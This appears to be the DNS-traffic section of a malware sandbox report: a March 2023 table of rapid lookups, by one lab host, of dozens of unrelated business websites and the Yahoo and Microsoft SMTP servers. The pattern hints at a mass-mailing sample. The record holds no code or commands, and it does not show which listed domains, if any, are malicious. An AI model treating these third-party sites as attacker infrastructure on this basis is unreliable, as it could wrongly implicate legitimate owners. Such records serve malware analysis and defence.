                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.637356997 CET8.8.8.8192.168.2.50x28b5No error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.686378956 CET8.8.8.8192.168.2.50xb1fcNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.730581045 CET8.8.8.8192.168.2.50x7f7bNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.730581045 CET8.8.8.8192.168.2.50x7f7bNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.734978914 CET8.8.8.8192.168.2.50xe243No error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.763801098 CET8.8.8.8192.168.2.50x6714No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.876228094 CET8.8.8.8192.168.2.50x82c9No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.147396088 CET8.8.8.8192.168.2.50x3cb3No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.147396088 CET8.8.8.8192.168.2.50x3cb3No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.154287100 CET8.8.8.8192.168.2.50xc723No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.310874939 CET8.8.8.8192.168.2.50xeaa5No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.310874939 CET8.8.8.8192.168.2.50xeaa5No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.318489075 CET8.8.8.8192.168.2.50x86caNo error (0)www.cokocoko.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.318489075 CET8.8.8.8192.168.2.50x86caNo error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.318489075 CET8.8.8.8192.168.2.50x86caNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.318489075 CET8.8.8.8192.168.2.50x86caNo error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.390086889 CET8.8.8.8192.168.2.50x3045No error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.516170979 CET8.8.8.8192.168.2.50x6b0cNo error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.516170979 CET8.8.8.8192.168.2.50x6b0cNo error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.994999886 CET8.8.8.8192.168.2.50x45e1No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.994999886 CET8.8.8.8192.168.2.50x45e1No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.013768911 CET8.8.8.8192.168.2.50xa34fName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.112667084 CET8.8.8.8192.168.2.50xd819No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.163495064 CET8.8.8.8192.168.2.50x6a87No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.163495064 CET8.8.8.8192.168.2.50x6a87No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.175268888 CET8.8.8.8192.168.2.50x6a87No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.175268888 CET8.8.8.8192.168.2.50x6a87No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.219280958 CET8.8.8.8192.168.2.50x38afNo error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.301237106 CET8.8.8.8192.168.2.50x8479No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.572885036 CET8.8.8.8192.168.2.50x64d9No error (0)www.findbc.com13.248.216.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.572885036 CET8.8.8.8192.168.2.50x64d9No error (0)www.findbc.com76.223.65.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.574079990 CET8.8.8.8192.168.2.50x5daNo error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.574079990 CET8.8.8.8192.168.2.50x5daNo error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.678854942 CET8.8.8.8192.168.2.50x5ad5No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.706525087 CET8.8.8.8192.168.2.50xbc2aNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.343671083 CET8.8.8.8192.168.2.50x45e5No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.427293062 CET8.8.8.8192.168.2.50x523No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.444685936 CET8.8.8.8192.168.2.50xf2a0No error (0)www.stnic.co.uk77.68.50.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.450680971 CET8.8.8.8192.168.2.50x428eNo error (0)www.dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.450680971 CET8.8.8.8192.168.2.50x428eNo error (0)www.dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.522350073 CET8.8.8.8192.168.2.50x2eb3No error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.533936977 CET8.8.8.8192.168.2.50x47fdNo error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.533936977 CET8.8.8.8192.168.2.50x47fdNo error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.808734894 CET8.8.8.8192.168.2.50xcff2No error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.808734894 CET8.8.8.8192.168.2.50xcff2No error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.808734894 CET8.8.8.8192.168.2.50xcff2No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.848126888 CET8.8.8.8192.168.2.50x55dcName error (3)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.942044020 CET8.8.8.8192.168.2.50x4b93No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.035718918 CET8.8.8.8192.168.2.50xb230No error (0)www.stajum.com103.3.1.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.107966900 CET8.8.8.8192.168.2.50x2c06No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.107966900 CET8.8.8.8192.168.2.50x2c06No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.708728075 CET8.8.8.8192.168.2.50xcc04No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.708728075 CET8.8.8.8192.168.2.50xcc04No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.708728075 CET8.8.8.8192.168.2.50xcc04No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.708728075 CET8.8.8.8192.168.2.50xcc04No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.708728075 CET8.8.8.8192.168.2.50xcc04No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:45.177572966 CET8.8.8.8192.168.2.50xe298No error (0)www.myropcb.com74.208.215.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:45.616159916 CET8.8.8.8192.168.2.50xb669No error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.097738981 CET8.8.8.8192.168.2.50x250fNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.404036045 CET8.8.8.8192.168.2.50x1033No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.544437885 CET8.8.8.8192.168.2.50x77e2No error (0)www.netcr.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.544437885 CET8.8.8.8192.168.2.50x77e2No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.544437885 CET8.8.8.8192.168.2.50x77e2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.544437885 CET8.8.8.8192.168.2.50x77e2No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.713511944 CET8.8.8.8192.168.2.50xaa84No error (0)smtp.sbcglobal.yahoo.comsmtp-sbc.mail.yahoo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.713511944 CET8.8.8.8192.168.2.50xaa84No error (0)smtp-sbc.mail.yahoo.comsmtp1.sbc.mail.am0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.713511944 CET8.8.8.8192.168.2.50xaa84No error (0)smtp1.sbc.mail.am0.yahoodns.net67.195.12.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.713511944 CET8.8.8.8192.168.2.50xaa84No error (0)smtp1.sbc.mail.am0.yahoodns.net66.163.170.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.713511944 CET8.8.8.8192.168.2.50xaa84No error (0)smtp1.sbc.mail.am0.yahoodns.net66.218.88.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.909080029 CET8.8.8.8192.168.2.50x428aNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.990920067 CET8.8.8.8192.168.2.50x250fServer failure (2)www.holleman.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.057709932 CET8.8.8.8192.168.2.50x250fNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.084330082 CET8.8.8.8192.168.2.50x8dd3No error (0)www.kernsafe.com172.67.72.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.084330082 CET8.8.8.8192.168.2.50x8dd3No error (0)www.kernsafe.com104.26.2.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.084330082 CET8.8.8.8192.168.2.50x8dd3No error (0)www.kernsafe.com104.26.3.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.265321016 CET8.8.8.8192.168.2.50x96c2No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.265321016 CET8.8.8.8192.168.2.50x96c2No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.265321016 CET8.8.8.8192.168.2.50x96c2No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.265321016 CET8.8.8.8192.168.2.50x96c2No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.265321016 CET8.8.8.8192.168.2.50x96c2No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.591526031 CET8.8.8.8192.168.2.50xa5c6No error (0)d2kt7vovxa5e81.cloudfront.net65.9.95.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.980047941 CET8.8.8.8192.168.2.50xfde6No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.173830032 CET8.8.8.8192.168.2.50xd080No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.174761057 CET8.8.8.8192.168.2.50x8320No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.174761057 CET8.8.8.8192.168.2.50x8320No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.174761057 CET8.8.8.8192.168.2.50x8320No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.209358931 CET8.8.8.8192.168.2.50xfc4cNo error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.424428940 CET8.8.8.8192.168.2.50xfb9aNo error (0)www.wifi4all.nl188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.424428940 CET8.8.8.8192.168.2.50xfb9aNo error (0)www.wifi4all.nl188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.605401993 CET8.8.8.8192.168.2.50xdffcNo error (0)www.fcwcvt.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.605401993 CET8.8.8.8192.168.2.50xdffcNo error (0)www.fcwcvt.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.097809076 CET8.8.8.8192.168.2.50x5c69No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.097809076 CET8.8.8.8192.168.2.50x5c69No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.097809076 CET8.8.8.8192.168.2.50x5c69No error (0)www.com-sit.com104.26.11.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.198414087 CET8.8.8.8192.168.2.50x7c46No error (0)www.snugpak.com104.21.73.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.198414087 CET8.8.8.8192.168.2.50x7c46No error (0)www.snugpak.com172.67.165.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.498873949 CET8.8.8.8192.168.2.50xd30cNo error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.851002932 CET8.8.8.8192.168.2.50xeeacNo error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.851002932 CET8.8.8.8192.168.2.50xeeacNo error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.130003929 CET8.8.8.8192.168.2.50xb57dNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.130003929 CET8.8.8.8192.168.2.50xb57dNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.242110014 CET8.8.8.8192.168.2.50x98bcNo error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.625988007 CET8.8.8.8192.168.2.50x64e2No error (0)www.yocinc.org66.94.119.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:52.088594913 CET8.8.8.8192.168.2.50x1391No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.071202040 CET8.8.8.8192.168.2.50x26d5No error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.071202040 CET8.8.8.8192.168.2.50x26d5No error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.071202040 CET8.8.8.8192.168.2.50x26d5No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com54.236.92.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.071202040 CET8.8.8.8192.168.2.50x26d5No error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.237.200.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.534262896 CET8.8.8.8192.168.2.50xe534No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.582869053 CET8.8.8.8192.168.2.50xe534No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.699426889 CET8.8.8.8192.168.2.50x5bc1No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.699426889 CET8.8.8.8192.168.2.50x5bc1No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:54.532502890 CET8.8.8.8192.168.2.50xe534No error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:54.634453058 CET8.8.8.8192.168.2.50xb031No error (0)www.ottospm.comwww.ottospm.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:54.646883965 CET8.8.8.8192.168.2.50xe78fNo error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:55.643063068 CET8.8.8.8192.168.2.50xe84cNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.985970974 CET8.8.8.8192.168.2.50xf02No error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.985970974 CET8.8.8.8192.168.2.50xf02No error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.989377975 CET8.8.8.8192.168.2.50x20fcNo error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.064048052 CET8.8.8.8192.168.2.50xf716No error (0)www.railbook.net207.244.76.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.464632988 CET8.8.8.8192.168.2.50xa513No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.590908051 CET8.8.8.8192.168.2.50xc3a5No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.590908051 CET8.8.8.8192.168.2.50xc3a5No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.072774887 CET8.8.8.8192.168.2.50x1590No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.102511883 CET8.8.8.8192.168.2.50x9778Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.308209896 CET8.8.8.8192.168.2.50x5036No error (0)www.tc17.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.308209896 CET8.8.8.8192.168.2.50x5036No error (0)www.tc17.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.737757921 CET8.8.8.8192.168.2.50x1e11No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.064258099 CET8.8.8.8192.168.2.50xe333No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.064258099 CET8.8.8.8192.168.2.50xe333No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.064258099 CET8.8.8.8192.168.2.50xe333No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.064258099 CET8.8.8.8192.168.2.50xe333No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.064258099 CET8.8.8.8192.168.2.50xe333No error (0)d2r2uj0bnofxxz.cloudfront.net65.9.95.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.394572973 CET8.8.8.8192.168.2.50xdc69No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.614660978 CET8.8.8.8192.168.2.50xd644No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.007332087 CET8.8.8.8192.168.2.50x15No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.007332087 CET8.8.8.8192.168.2.50x15No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.294930935 CET8.8.8.8192.168.2.50x6c8bNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.294930935 CET8.8.8.8192.168.2.50x6c8bNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.354341984 CET8.8.8.8192.168.2.50xd23aServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.357665062 CET8.8.8.8192.168.2.50xed64Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.015710115 CET8.8.8.8192.168.2.50x562No error (0)www.com-sit.com172.67.70.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.015710115 CET8.8.8.8192.168.2.50x562No error (0)www.com-sit.com104.26.10.81A (IP address)IN (0x0001)false
